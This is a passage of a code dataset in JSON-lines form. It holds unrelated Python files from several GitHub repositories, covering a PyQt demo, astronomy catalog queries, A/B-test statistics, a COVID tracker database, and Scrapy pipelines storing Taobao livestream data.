data=csv,\n file_name='data.csv',\n mime='text/csv',\n)","repo_name":"escott8908/trend_analysis","sub_path":"trend_analysis_app.py","file_name":"trend_analysis_app.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27647748753","text":"import os, json, logging\nfrom .DbManager import DbManager\n\nclass DataDisplayer:\n def __init__(self, configurations):\n self.configurations = configurations\n\n def 
display(self,):\n logging.info('Starting the displaying of data')\n self.display_all()\n self.display_gender_stats()\n\n def display_all(self):\n profiles = []\n with DbManager(self.configurations) as db_manager:\n profiles = db_manager.get_profiles()\n\n message = \"Total number of profiles: \" + str(len(profiles))\n logging.info(message)\n print(message)\n\n for current_profile in profiles:\n message = current_profile.formatted()\n logging.info(message)\n print(message)\n\n def display_gender_stats(self):\n profiles = []\n with DbManager(self.configurations) as db_manager:\n gender_data = db_manager.get_gender_totals()\n message = \"Total of females: \" + str(gender_data['female']) + \" males: \" + str(gender_data['male']) + \" and undefined: \" + str(gender_data['undefined'])\n logging.info(message)\n print(message)\n\n proportion_female = str(round(gender_data['female'] * 100 / gender_data['total'], 1))\n proportion_male = str(round(gender_data['male'] * 100 / gender_data['total'], 1))\n proportion_undefined = str(round(gender_data['undefined'] * 100 / gender_data['total'], 1))\n\n message = \"Proportion of females: \" + proportion_female + \" males: \" + proportion_male + \" and undefined: \" + proportion_undefined\n logging.info(message)\n print(message)\n\n unnacounted = gender_data['female'] + gender_data['male'] + gender_data['undefined'] - gender_data['total']\n if unnacounted != 0:\n message = \"There are \" + unnacounted + \" profiles with an invalid gender\"\n logging.info(message)\n print(message)\n","repo_name":"msscelo/linkedin-report","sub_path":"classes/DataDisplayer.py","file_name":"DataDisplayer.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40637104978","text":"num1 = [5, 10, 15]\nnum2 = [10, 15]\n\nnum3 = [5, 10, 15]\nnum4 = num2[:]\n\n\nfor val in num1:\n\tif val in num2:\n\t\tnum1.remove(val)\n\nprint(num1)\n\nfor val in num3[:]:\n\tif val in num4:\n\t\tnum3.remove(val)\n\nprint(num3)\n\n","repo_name":"davidseungjin/Python","sub_path":"ch0807_2.py","file_name":"ch0807_2.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27967724252","text":"\n\nimport sys\nfrom PyQt5 import QtWidgets, QtCore\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtCore import QObject, pyqtSlot\nfrom PyQt5 import QtGui\n\n\ndef qt_message_handler(mode, context, message):\n if mode == QtCore.QtInfoMsg:\n mode = 'INFO'\n elif mode == QtCore.QtWarningMsg:\n mode = 'WARNING'\n elif mode == QtCore.QtCriticalMsg:\n mode = 'CRITICAL'\n elif mode == QtCore.QtFatalMsg:\n mode = 'FATAL'\n else:\n mode = 'DEBUG'\n print('qt_message_handler: line: %d, func: %s(), file: %s' % (\n context.line, context.function, context.file))\n print(' %s: %s\\n' % (mode, message))\n\n\n\n\n\n # -*- coding: UTF-8 -*-\nimport sys\nimport time\nfrom PyQt5 import QtWidgets\ndef on_clicked():\n\n button.setEnabled(False)\n QtWidgets.QApplication.processEvents()\n for i in range(1000000000):\n print(i**3)\n # time.sleep(1)\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n window = QtWidgets.QWidget()\n button = QtWidgets.QPushButton('Button')\n button.clicked.connect(on_clicked)\n box = QtWidgets.QHBoxLayout()\n box.addWidget(button)\n window.setLayout(box)\n window.show()\n 
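    # --- Added annotation, not part of the original source ---
    # Design note on on_clicked() above: it disables the button and then calls
    # QtWidgets.QApplication.processEvents() so the pending repaint is flushed
    # *before* the long blocking loop starts; without that call the button
    # would still look enabled while the GUI froze. A worker QThread would be
    # the more robust design, but this snippet demonstrates the
    # processEvents() workaround.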
sys.exit(app.exec_())\n","repo_name":"zaswed76/pc_club","sub_path":"club_stat/exemple/gui/ttt.py","file_name":"ttt.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12677516712","text":"def pytest_configure( config ):\n # One of PyTest's nanny features is to redirect stdin to a thing that refuses to be read\n # from. It is supposed to prevent tests from accidentally getting blocked waiting for user\n # input. I have never in my life had a test that blocked on stdin without it being completely\n # obvious, even without this nanny redirect. However, I've repeatedly run into issues where\n # this redirection gets in the way, mainly with Fabric:\n #\n # http://jenkins.cgcloud.info/job/cgcloud/304/testReport/junit/src.cgcloud.core.test.test_core/CoreTests/test_generic_fedora_22_box/\n #\n # This workaround disables that nanny feature.\n capman = config.pluginmanager.get_plugin( 'capturemanager' )\n if capman._capturing.in_ is not None:\n capman._capturing.in_.done( )\n capman._capturing.in_ = None\n","repo_name":"BD2KGenomics/cgcloud","sub_path":"core/src/cgcloud/core/test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"36511968502","text":"\"\"\"\nQuerier class\n\n\"\"\"\n\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.io import ascii\nfrom astropy.table import Table\nfrom astroquery.gaia import Gaia\n\nimport numpy as np\nimport requests\n\nclass Querier:\n\n\t@staticmethod\n\tdef ps1_checklegal(table, release):\n\n\t\treleaselist = (\"dr1\", \"dr2\")\n\n\t\tif release not in (\"dr1\", \"dr2\"):\n\t\t\traise ValueError(\"Bad value for release (must be one of {})\".format(\", \".join(releaselist)))\n\n\t\tif release == \"dr1\":\n\t\t\ttablelist = (\"mean\", \"stack\")\n\t\telse:\n\t\t\ttablelist = (\"mean\", \"stack\", \"detection\")\n\n\t\tif table not in tablelist:\n\t\t\traise ValueError(\"Bad value for table (for {} must be one of {})\".format(release, \", \".join(tablelist)))\n\n\t@staticmethod\n\tdef ps1_cone(ra, dec, radius, table=\"mean\", release=\"dr2\", format=\"csv\", columns=None, baseurl=\"https://catalogs.mast.stsci.edu/api/v0.1/panstarrs\", verbose=False, **kw):\n\n\t\tdata = kw.copy()\n\t\tdata[\"ra\"] = ra\n\t\tdata[\"dec\"] = dec\n\t\tdata[\"radius\"] = radius\n\n\t\treturn Querier.ps1_search(table=table, release=release, format=format, columns=columns, baseurl=baseurl, verbose=verbose, **data)\n\n\t@staticmethod\n\tdef ps1_metadata(table=\"mean\", release=\"dr2\", baseurl=\"https://catalogs.mast.stsci.edu/api/v0.1/panstarrs\"):\n\n\t\tQuerier.ps1_checklegal(table, release)\n\n\t\turl = f\"{baseurl}/{release}/{table}/metadata\"\n\n\t\tr = requests.get(url)\n\t\tr.raise_for_status()\n\t\tv = r.json()\n\n\t\ttable = Table(rows=[(x[\"name\"], x[\"type\"], x[\"description\"]) for x in v], names=(\"name\", \"type\", \"description\"))\n\n\t\treturn table\n\n\t@staticmethod\n\tdef ps1_search(table=\"mean\", release=\"dr2\", format=\"csv\", columns=None, baseurl=\"https://catalogs.mast.stsci.edu/api/v0.1/panstarrs\", verbose=False, **kw):\n\n\t\tdata = kw.copy()\n\n\t\tif not data:\n\t\t\traise ValueError(\"You must specify some parameters for search\")\n\n\t\tQuerier.ps1_checklegal(table, release)\n\n\t\tif format not in (\"csv\", \"votable\", \"json\"):\n\t\t\traise ValueError(\"Bad value for 
format\")\n\n\t\turl = f\"{baseurl}/{release}/{table}.{format}\"\n\n\t\tif columns:\n\t\t\tdcols = {}\n\n\t\t\tfor col in Querier.ps1_metadata(table, release)[\"name\"]:\n\t\t\t\tdcols[col.lower()] = 1\n\n\t\t\tbadcols = []\n\t\t\tfor col in columns:\n\t\t\t\tif col.lower().strip() not in dcols:\n\t\t\t\t\tbadcols.append(col)\n\t\t\tif badcols:\n\t\t\t\traise ValueError(\"Some columns not found in table: {}\".format(\", \".join(badcols)))\n\n\t\t\tdata[\"columns\"] = \"[{}]\".format(\",\".join(columns))\n\n\t\tr = requests.get(url, params=data)\n\n\t\tif verbose:\n\t\t\tprint(r.url)\n\n\t\tr.raise_for_status()\n\n\t\tif format == \"json\":\n\t\t\treturn r.json()\n\t\telse:\n\t\t\treturn r.text\n\n\t@staticmethod\n\tdef query_gaia_cone(ra, dec, radius):\n\n\t\tpprint(\"Submitting Gaia cone search\")\n\t\tGaia.MAIN_GAIA_TABLE = \"gaiadr2.gaia_source\"\n\t\tGaia.ROW_LIMIT = -1\n\n\t\tra = str(ra)\n\t\tdec = str(dec)\n\n\t\tsearch_coord = SkyCoord(ra, dec, unit=(u.deg, u.deg), frame=\"fk5\")\n\t\tsearch_radius = u.Quantity(radius, u.deg)\n\t\tsearch = Gaia.cone_search_async(search_coord, search_radius)\n\n\t\ttable = search.get_results()\n\n\t\treturn table\n\n\t@staticmethod\n\tdef query_gaia_square(ra, dec, side):\n\n\t\tprint(\"Submitting Gaia square search\")\n\t\tGaia.MAIN_GAIA_TABLE = \"gaiadr2.gaia_source\"\n\t\tGaia.ROW_LIMIT = -1\n\n\t\tra = str(ra)\n\t\tdec = str(dec)\n\t\tside = float(side)\n\n\t\tsearch_coord = SkyCoord(ra, dec, unit=(u.deg, u.deg), frame=\"fk5\")\n\t\tsearch_width = u.Quantity(side, u.deg)\n\t\tsearch_height = u.Quantity(side, u.deg)\n\n\t\ttable = Gaia.query_object_async(search_coord, width=search_width, height=search_height)\n\n\t\treturn table\n\n\t@staticmethod\n\tdef query_ps1_cone(ra, dec, radius):\n\n\t\tprint(\"Submitting PS1 cone search\")\n\t\trelease = \"dr2\"\n\t\tconstraints = {\"nDetections.gt\":1}\n\n\t\tra = float(ra)\n\t\tdec = float(dec)\n\t\tradius = float(radius)\n\n\t\tcolumns = \"\"\"objID, raMean, decMean, nDetections, ng, nr, ni, nz, ny, gMeanPSFMag, rMeanPSFMag, iMeanPSFMag, zMeanPSFMag, yMeanPSFMag\"\"\".split(\",\")\n\t\tcolumns = [x.strip() for x in columns]\n\t\tcolumns = [x for x in columns if x and not x.startswith(\"#\")]\n\n\t\tresults = Querier.ps1_cone(ra, dec, radius, release=release, columns=columns, **constraints)\n\n\t\ttable = ascii.read(results)\n\n\t\tfor filter in \"grizy\":\n\t\t\tcol = filter + \"MeanPSFMag\"\n\t\t\ttry:\n\t\t\t\ttable[col].format = \".4f\"\n\t\t\t\ttable[col][table[col] == -999.0] = np.nan\n\t\t\texcept KeyError:\n\t\t\t\tprint(\"{} not found\".format(col))\t\n\n\t\treturn table","repo_name":"rcamuccio/Hades","sub_path":"lib/querier.py","file_name":"querier.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37034947606","text":"from keras.datasets import imdb\nimport numpy as np\n\nold = np.load\nnp.load = lambda *a,**k: old(*a,**k,allow_pickle=True)\n(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=6000)\nnp.load = old\ndel(old)\n\nprint(x_train[0])\nprint(y_train[0])\n\nwind = imdb.get_word_index()\nwind['kagan']\nrevind = dict((v, k) for k, v in wind.items())\n\ndef decode(sent_list):\n new_words = []\n for i in sent_list:\n new_words.append(revind.get(i-3, '*'))\n comb_words = ' '.join(new_words)\n return 
comb_words\n\ndecode(x_train[0])\n","repo_name":"seungukson/NLP_lab","sub_path":"190724_p291.IMDB(data).py","file_name":"190724_p291.IMDB(data).py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20538770089","text":"import sqlite3\nimport os\nfrom datetime import datetime\n\n# Connecting python program to database\npathname = __file__\npathname = pathname[:-8]\n\nconn = sqlite3.connect(\n pathname + 'cov.db')\nc = conn.cursor()\n\n\nclass Person(object):\n\n def __init__(self, dateTime, id, last_name, first_name, address, contact_number, last_location):\n self.id = id\n self.dateTime = dateTime\n self.last_name = last_name\n self.first_name = first_name\n self.address = address\n self.contact_number = contact_number\n self.last_location = last_location\n\n insert_db(self.id, self.dateTime, self.last_name, self.first_name,\n self.address, self.contact_number, self.last_location)\n\n#Add ka dito ng function na kukuha ng data from database tapos icchart gamit matplot lib tapos route mo siya papunta sa view file\n#then yung view file yung mag format kung anong itsura ng chart na trip mo palabasin then add ka ng option sa controller para sa user if gusto niya makita charts\n\ndef get_all():\n c.execute(\"SELECT * FROM cov_tracker \")\n fetched_list = c.fetchall()\n conn.commit()\n\n return fetched_list\n\n\ndef create_person():\n Person(str(datetime.now()),input(\"Enter ID: \"), input(\"Enter Last name: \"), input(\"Enter First name: \"), input(\n \"Enter Address: \"), input(\"Enter Contact number: \"), input(\"Enter Last location: \"))\n\n\ndef insert_db(id, dateTime, last_name, first_name, address, contact_number, last_location):\n c.execute(\"INSERT INTO cov_tracker VALUES (:id, :datetime, :lastn, :firstn, :address, :cn, :lastloc )\", {\n 'id': id, 'datetime' :dateTime, 'lastn': last_name, 'firstn': first_name, 'address': address, 'cn': contact_number, 'lastloc': last_location})\n conn.commit()\n\n\n\ndef search_db(id):\n c.execute(\"SELECT * FROM cov_tracker WHERE ID = :id\", {'id': id})\n fetched_list = c.fetchall()\n conn.commit()\n\n return fetched_list\n\n\ndef search_db_bykeyword(keyword):\n c.execute(\"SELECT * FROM cov_tracker WHERE FIRST_NAME LIKE ?\",\n ('%'+keyword+'%',))\n fetched_list = c.fetchall()\n conn.commit()\n\n return fetched_list\n\ndef del_entry(id):\n c.execute(\"DELETE FROM cov_tracker WHERE ID = :id\", {'id': id})\n conn.commit()\n\n\ndef close_connection():\n conn.close()\n","repo_name":"MauiAus/SampleRepo","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16946207770","text":"import collections\nimport math\nimport sys\n\nfrom scipy import stats\n\nif sys.version_info >= (3,):\n xrange = range\n\ndef get_z_critical_value(alpha, two_tailed=True):\n \"\"\"\n Returns the z critical value for a particular alpha = 1 - confidence level. 
By default returns\n a two-tailed z-value, meaning the actual tail probability is alpha / 2.\n \"\"\"\n if two_tailed:\n alpha /= 2\n return stats.distributions.norm.ppf(1 - alpha)\n\n# a value with confidence interval bounds (not necessarily centered around the point estimate)\nValueWithInterval = collections.namedtuple(\n 'ValueWithInterval',\n ('value', 'lower_bound', 'upper_bound'),\n)\n\nclass ValueWithError(object):\n \"\"\"\n A value with standard error, from which a confidence interval can be derived.\n \"\"\"\n def __init__(self, value, error):\n self.value = value\n self.error = error\n\n def confidence_interval_width(self, z_critical_value):\n \"\"\"\n z_critical_value should be the value at which the right-tail probability for a standard\n normal distribution equals half the desired alpha = 1 - confidence level:\n\n P(Z > z_value) = 1 - alpha / 2\n\n where Z is an N(0, 1) random variable. Use get_z_critical_value(), or see\n http://en.wikipedia.org/wiki/Standard_normal_table.\n \"\"\"\n return z_critical_value * self.error\n\n def value_with_interval(self, z_critical_value, estimated_value=None):\n width = self.confidence_interval_width(z_critical_value)\n return ValueWithInterval(\n value=estimated_value if estimated_value is not None else self.value,\n lower_bound=self.value - width,\n upper_bound=self.value + width,\n )\n\nclass BinomialDistribution(object):\n def __init__(self, num_trials, probability):\n self.num_trials = num_trials\n self.probability = probability\n self.expectation = num_trials * probability\n self.standard_deviation = math.sqrt(self.expectation * (1 - probability))\n self._binomial = stats.binom(num_trials, probability)\n\n def mass(self, count):\n return self._binomial.pmf(count)\n\n def cdf(self, count):\n return self._binomial.cdf(count)\n\n def survival(self, count):\n return 1 - self.cdf(count)\n\n def inverse_cdf(self, probability):\n return self._binomial.ppf(probability)\n\n def inverse_survival(self, probability):\n return self._binomial.isf(probability)\n\nclass Proportion(object):\n def __init__(self, num_successes, num_trials):\n \"\"\"\n Represents a binomial proportion with num_successes successful samples out of num_trials\n total.\n \"\"\"\n self.num_successes = num_successes\n self.num_trials = num_trials\n\n def p_estimate(self, z_critical_value=0):\n \"\"\"\n Generate an adjusted estimate and error using the \"Agresti-Coull Interval\", see\n http://en.wikipedia.org/wiki/Binomial_proportion_confidence_interval#Agresti-Coull_Interval.\n\n The estimated value is an adjusted best estimate for the actual probability. 
For example, if\n 0 successes were observed out of 10 samples, it's unlikely the actual probability is zero,\n so the adjusted estimate will be slightly above zero.\n\n A z_critical_value of zero yields the ordinary Wald interval.\n \"\"\"\n adjusted_num_trials = float(self.num_trials + z_critical_value**2)\n interval_center = (self.num_successes + z_critical_value**2 / 2) / adjusted_num_trials\n standard_error = math.sqrt(interval_center * (1 - interval_center) / adjusted_num_trials)\n return ValueWithError(interval_center, standard_error)\n\n def mixed_estimate(self, z_critical_value):\n \"\"\"\n Returns an ValueWithInterval with a MLE value and upper/lower bounds from the Agresti-Coull\n interval.\n \"\"\"\n return (\n self.p_estimate(z_critical_value=z_critical_value)\n .value_with_interval(z_critical_value, estimated_value=self.p_estimate().value)\n )\n\ndef confidence_interval_on_proportion(num_successes, num_trials, confidence_level=0.95):\n '''Convenience function with more straightforward interface.'''\n return Proportion(num_successes, num_trials).mixed_estimate(\n get_z_critical_value(1 - confidence_level)\n )\n\nclass ProportionComparison(object):\n def __init__(self, baseline, variation):\n self.baseline = baseline\n self.variation = variation\n\n def difference_estimate(self, z_critical_value):\n \"\"\"\n Generate an estimate of the difference in success rates between the variation and the\n baseline.\n \"\"\"\n baseline_p = self.baseline.p_estimate(z_critical_value=z_critical_value)\n variation_p = self.variation.p_estimate(z_critical_value=z_critical_value)\n difference = variation_p.value - baseline_p.value\n standard_error = math.sqrt(baseline_p.error ** 2 + variation_p.error ** 2)\n return ValueWithError(difference, standard_error)\n\n def difference_ratio(self, z_critical_value):\n \"\"\"\n Return the difference in sucess rates as a proportion of the baseline success rate.\n \"\"\"\n baseline_value = self.baseline.p_estimate(z_critical_value=z_critical_value).value\n difference = self.difference_estimate(z_critical_value=z_critical_value)\n ratio = difference.value / baseline_value\n error = difference.error / baseline_value\n return ValueWithError(ratio, error)\n\n def z_test(self, z_multiplier=1):\n \"\"\"\n Perform a large-sample z-test of null hypothesis H0: p_baseline == p_variation against\n alternative hypothesis H1: p_baseline < p_variation. 
Return the (one-tailed) p-value.\n\n z_multiplier: test z-value will be multiplied by this factor before computing a p-value.\n\n See http://en.wikipedia.org/wiki/Statistical_hypothesis_testing#Common_test_statistics,\n \"Two-proportion z-test, pooled for d0 = 0\".\n \"\"\"\n pooled_stats = Proportion(\n self.baseline.num_successes + self.variation.num_successes,\n self.baseline.num_trials + self.variation.num_trials,\n )\n pooled_p_value = pooled_stats.p_estimate().value\n pooled_variance_of_difference = (\n pooled_p_value * (1 - pooled_p_value)\n * (1.0 / self.baseline.num_trials + 1.0 / self.variation.num_trials)\n )\n pooled_standard_error_of_difference = math.sqrt(pooled_variance_of_difference)\n test_z_value = self.difference_estimate(0).value / pooled_standard_error_of_difference\n adjusted_p_value = stats.distributions.norm.sf(test_z_value * z_multiplier)\n return adjusted_p_value\n\n def _binomial_coverage_interval(self, distribution, coverage_alpha):\n \"\"\"\n For the given binomial distribution, compute an interval that covers at least (1 -\n coverage_alpha) of the total probability mass, centered at the expectation (unless we're at\n the boundary). Uses the normal approximation.\n \"\"\"\n if distribution.num_trials < 1000:\n # don't even bother trying to optimize for small-ish sample sizes\n return (0, distribution.num_trials)\n else:\n return (\n int(math.floor(distribution.inverse_cdf(coverage_alpha / 2))),\n int(math.ceil(distribution.inverse_survival(coverage_alpha / 2))),\n )\n\n def _probability_union(self, probability, num_tests):\n \"\"\"\n Given the probability of an event, compute the probability that it happens at least once in\n num_tests independent tests. This is used to adjust a p-value for multiple comparisons.\n When used to adjust alpha instead, this is called a Sidak correction (the logic is the same,\n the formula is inverted):\n http://en.wikipedia.org/wiki/Bonferroni_correction#.C5.A0id.C3.A1k_correction\n \"\"\"\n return 1 - (1 - probability)**num_tests\n\n def iterated_test(self, num_tests, coverage_alpha, improvement_only=False):\n \"\"\"\n Compute a p-value testing null hypothesis H0: p_baseline == p_variation against alternative\n hypothesis H1: p_baseline != p_variation by summing p-values conditioned on individual\n baseline success counts. This provides a more accurate correction for multiple testing but\n scales like O(sqrt(self.baseline.num_trials)), so can eventually get slow for very large\n values.\n\n Lower coverage_alpha increases accuracy at the cost of longer runtime. 
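        (Added illustration, not in the original docstring: each conditional
        p-value is inflated through _probability_union() above before being
        weighted, so e.g. a per-baseline-count p-value of 0.01 with
        num_tests = 3 independent comparisons becomes
        1 - (1 - 0.01)**3 ~= 0.0297.)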
Roughly, the result\n will be accurate within no more than coverage_alpha (but this ignores error due to the\n normal approximation so isn't guaranteed).\n\n If improvement_only=True, computes p-value for alternative hypothesis\n H1: p_baseline < p_variation instead.\n \"\"\"\n observed_delta = self.variation.p_estimate().value - self.baseline.p_estimate().value\n if observed_delta == 0 and not improvement_only:\n # a trivial case that the code below does not handle well\n return 1\n\n pooled_proportion = (\n (self.baseline.num_successes + self.variation.num_successes)\n / float(self.baseline.num_trials + self.variation.num_trials)\n )\n variation_distribution = BinomialDistribution(self.variation.num_trials, pooled_proportion)\n baseline_distribution = BinomialDistribution(self.baseline.num_trials, pooled_proportion)\n\n baseline_limits = self._binomial_coverage_interval(baseline_distribution, coverage_alpha)\n p_value = 0\n for baseline_successes in xrange(baseline_limits[0], baseline_limits[1] + 1):\n baseline_proportion = 1.0 * baseline_successes / self.baseline.num_trials\n if improvement_only:\n lower_trial_count = -1\n upper_trial_count = math.ceil(\n (baseline_proportion + observed_delta) * self.variation.num_trials\n )\n else:\n observed_absolute_delta = abs(observed_delta)\n lower_trial_count = math.floor(\n (baseline_proportion - observed_absolute_delta) * self.variation.num_trials\n )\n upper_trial_count = math.ceil(\n (baseline_proportion + observed_absolute_delta) * self.variation.num_trials\n )\n\n # p-value of variation success counts \"at least as extreme\" for this particular\n # baseline success count\n p_value_at_baseline = (\n variation_distribution.cdf(lower_trial_count)\n + variation_distribution.survival(upper_trial_count - 1)\n )\n\n # this is exact because we're conditioning on the baseline count, so the multiple\n # tests are independent.\n adjusted_p_value = self._probability_union(p_value_at_baseline, num_tests)\n\n baseline_probability = baseline_distribution.mass(baseline_successes)\n p_value += baseline_probability * adjusted_p_value\n\n # the remaining baseline values we didn't cover contribute less than coverage_alpha to the\n # sum, so adding that amount gives us a conservative upper bound.\n return p_value + coverage_alpha\n\nResults = collections.namedtuple(\n 'Results',\n (\n 'num_successes',\n 'num_trials',\n 'proportion', # ValueWithInterval\n 'improvement', # ValueWithInterval\n 'relative_improvement', # ValueWithInterval\n 'two_tailed_p_value', # two-tailed p-value for trial != baseline\n 'improvement_one_tailed_p_value', # one-tailed p-value for trial > baseline\n ),\n)\n\nclass Experiment(object):\n P_VALUE_PRECISION = 1e-5\n\n def __init__(self, num_trials, baseline_num_successes, baseline_num_trials,\n confidence_level=0.95):\n \"\"\"\n num_trials: number of trials to be compared to the baseline\n confidence_level: used for all confidence intervals generated\n \"\"\"\n self.num_comparisons = max(1, num_trials)\n self._baseline = Proportion(baseline_num_successes, baseline_num_trials)\n alpha = (1 - confidence_level) / num_trials # Bonferroni correction\n self._z_critical_value = get_z_critical_value(alpha)\n\n def get_baseline_proportion(self):\n return self._baseline.mixed_estimate(self._z_critical_value)\n\n def get_results(self, num_successes, num_trials):\n trial = Proportion(num_successes, num_trials)\n comparison = ProportionComparison(self._baseline, trial)\n return Results(\n num_successes=num_successes,\n num_trials=num_trials,\n 
proportion=trial.mixed_estimate(self._z_critical_value),\n improvement=comparison.difference_estimate(self._z_critical_value)\n .value_with_interval(\n self._z_critical_value,\n estimated_value=comparison.difference_estimate(0).value,\n ),\n relative_improvement=comparison.difference_ratio(self._z_critical_value)\n .value_with_interval(\n self._z_critical_value,\n estimated_value=comparison.difference_ratio(0).value,\n ),\n two_tailed_p_value=comparison.iterated_test(\n self.num_comparisons,\n self.P_VALUE_PRECISION,\n ),\n improvement_one_tailed_p_value=comparison.iterated_test(\n self.num_comparisons,\n self.P_VALUE_PRECISION,\n improvement_only=True,\n ),\n )\n","repo_name":"thumbtack/abba","sub_path":"python/abba/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":13687,"program_lang":"python","lang":"en","doc_type":"code","stars":245,"dataset":"github-code","pt":"53"} +{"seq_id":"7956693101","text":"# -*- python -*-\n\nload(\"@drake//tools/workspace:github.bzl\", \"github_archive\")\n\n# Note that we do NOT install a LICENSE file as part of the Drake install\n# because this repository is required only when building and testing with\n# Bazel.\n\ndef rules_python_repository(\n name,\n mirrors = None):\n github_archive(\n name = name,\n repository = \"bazelbuild/rules_python\", # License: Apache-2.0\n commit = \"38f86fb55b698c51e8510c807489c9f4e047480e\",\n sha256 = \"c911dc70f62f507f3a361cbc21d6e0d502b91254382255309bc60b7a0f48de28\", # noqa\n mirrors = mirrors,\n )\n","repo_name":"julesser/drake","sub_path":"tools/workspace/rules_python/repository.bzl","file_name":"repository.bzl","file_ext":"bzl","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38712625287","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nimport csv\nimport time\n\nimport redis\nfrom pymongo import MongoClient\nfrom scrapy.utils.project import get_project_settings\n\n\nclass AnchorspiderPipeline(object):\n def process_item(self, item, spider):\n return item\n\n\nclass CsvPipeline(object):\n def __init__(self):\n self.f = open(\"anchor_data.csv\", \"a+\", encoding='utf-8', newline='')\n self.writer = csv.writer(self.f)\n self.writer.writerow(['userId', 'nick', 'fansCount'])\n\n def process_item(self, item, spider):\n goods = [item['userId'], item['nick'], item['fansCount']]\n\n self.writer.writerow(goods)\n return item\n\n def close_spider(self, spider): # 关闭\n self.f.close()\n\n\nclass AnchorMongoDBPipeline(object):\n collection = 'anchor_data'\n def __init__(self,mongo_uri,mongo_db,collection_dict):\n self.mongo_uri = mongo_uri\n self.mongo_db = mongo_db\n self.collection_dict = collection_dict\n self.time_str = time.strftime(\"%Y-%m-%d\", time.localtime())\n\n @classmethod\n def from_crawler(cls, crawler):\n '''\n scrapy为我们访问settings提供了这样的一个方法,这里,\n 我们需要从settings.py文件中,取得数据库的URI和数据库名称\n '''\n return cls(\n mongo_uri=crawler.settings.get('MONGO_URI'),\n mongo_db=crawler.settings.get('MONGO_DB'),\n collection_dict = crawler.settings.get('COLLECTION')\n )\n\n def open_spider(self,spider):\n self.client = MongoClient(self.mongo_uri)\n self.db = self.client[self.mongo_db]\n\n def close_spider(self,spider):\n self.client.close()\n\n def process_item(self,item,spider):\n data = {\n \"userId\": item['userId'],\n \"nick\": item['nick'],\n 'fansCount': 
item['fansCount'],\n\n }\n table = self.db[self.collection]\n table.insert_one(data)\n return item\n\nclass AnchorDataMongoDBPipeline(object):\n # collection = 'YunzkData(ku.iyunzk.com)'\n def __init__(self, mongo_uri, mongo_db, collection_dict, catId):\n self.catId = catId\n self.mongo_uri = mongo_uri\n self.mongo_db = mongo_db\n self.collection_dict = collection_dict\n self.time_str = time.strftime(\"%Y-%m-%d\", time.localtime())\n self.setting = get_project_settings()\n self.r = redis.StrictRedis(host=self.setting.get('REDIS_IP'), port=self.setting.get('REDIS_PORT'), db=0,\n password=self.setting.get('REDIS_PASSWORD'))\n\n @classmethod\n def from_crawler(cls, crawler):\n '''\n scrapy为我们访问settings提供了这样的一个方法,这里,\n 我们需要从settings.py文件中,取得数据库的URI和数据库名称\n '''\n return cls(\n mongo_uri=crawler.settings.get('MONGO_URI'),\n mongo_db=crawler.settings.get('MONGO_DB'),\n collection_dict=crawler.settings.get('COLLECTION'),\n catId = crawler.settings.get('Category')\n )\n\n def open_spider(self, spider):\n print(spider.name)\n self.client = MongoClient(self.mongo_uri)\n self.db = self.client[self.mongo_db]\n self.collection = self.db[self.collection_dict[spider.name]]\n\n def close_spider(self, spider):\n self.client.close()\n\n def process_item(self, item, spider):\n if spider.name == 'tb_anchor_goods':\n self.process_anchor_goods(item)\n elif spider.name == 'tb_anchor':\n self.process_anchor(item)\n elif spider.name == 'tb_anchorid':\n self.process_anchorid(item)\n elif spider.name == 'dev_tb_anchor':\n self.process_dev_anchor(item)\n elif spider.name == 'tb_anchor_goods_task':\n self.process_tb_anchor_goods_task(item)\n\n def process_anchor_goods(self, item):\n res = self.collection.find_one({\"anchorId\": item.get('accountId'), 'createTime':item.get('createTime'), \"itemId\": item.get('itemId')})\n if not res:\n categoryid = self.catId.get(item.get('categoryId'))\n if not categoryid:\n categoryid = self.catId.get(item.get('rootCategoryId'))\n\n if not categoryid:\n categoryid = None\n data = {\n 'anchorId': item.get('accountId'),\n 'anchorName': item.get('accountName'),\n 'title': item.get('title'),\n 'createTime': item.get('createTime'),\n 'itemId': item.get('itemId'),\n 'sellerId': item.get('sellerId'),\n 'goods_url': item.get('goods_url'),\n 'shopName': item.get('shopName'),\n 'liveId': item.get('liveId'),\n 'liveURL': item.get('liveURL'),\n 'livePrice': item.get('livePrice'),\n 'categoryId': item.get('categoryId'),\n 'class2name': item.get('class2name'),\n 'shopId': item.get('shopId'),\n 'shopType': item.get('shopType'),\n 'maintype': item.get('maintype'),\n 'rootCategoryId': item.get('rootCategoryId'),\n \"Monthly_payment\": None,\n \"CommtentCount\": None,\n 'is_dispose': 1,\n 'plcategory': categoryid\n }\n\n self.collection.insert_one(data)\n self.r.sadd('ALL_liveId:ItemId', '{}:{}'.format(item.get('liveId'), item.get('itemId')))\n return item\n\n def process_anchor(self, item):\n res = self.collection.find_one({\"accountId\": 